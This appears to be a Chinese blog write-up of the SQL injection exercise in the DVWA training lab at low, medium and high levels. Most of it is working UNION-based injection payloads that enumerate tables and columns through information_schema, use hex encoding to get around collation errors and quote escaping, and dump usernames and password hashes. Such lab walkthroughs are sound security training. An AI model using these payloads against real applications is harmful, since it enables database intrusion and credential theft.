DVWA-SQL Injection

LOW级别

判断存在注入

?id=1正常回显

?id=1'报错

?id=1'--+回显正常,说明存在符号型注入,闭合方式为'

爆字段

?id=1' order by 2--+回显正常

?id=1'+order+by+3--+报错,说明字段数为2

报显示位

?id='+union+select+1,2--+显示位1,2

查表

?id=1'+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()--+

报错Illegal mix of collations for operation 'UNION'

通过百度,这是由于编码的某种问题造成的,可以使用16进制进行读取

?id=1'+union+select+1,concat_ws('~',hex(table_name))+from+information_schema.tables+where+table_schema=database()--+

之后再解码就好

查列

?id=1'+union+select+1,concat_ws('~',hex(column_name))+from+information_schema.columns+where+table_name='users'+and+table_schema=database()--+

查数据

?id=1'+union+select+1,group_concat(hex(user),',',hex(password))+from+users--+

也可以直接使用unhex函数
?id=1'+union+select+1,group_concat(unhex(hex(user)),',',unhex(hex(password))+from+users--+

medium级别

这关换成了post请求

burp抓包,操作同low级别一样,发现单引号会被转义,查列的时候where+table_name='users'可以转换为16进制users 的 十六进制为 0x75736572

high级别

1' union select user,password from users#

直接结束?

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

伍_玖

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值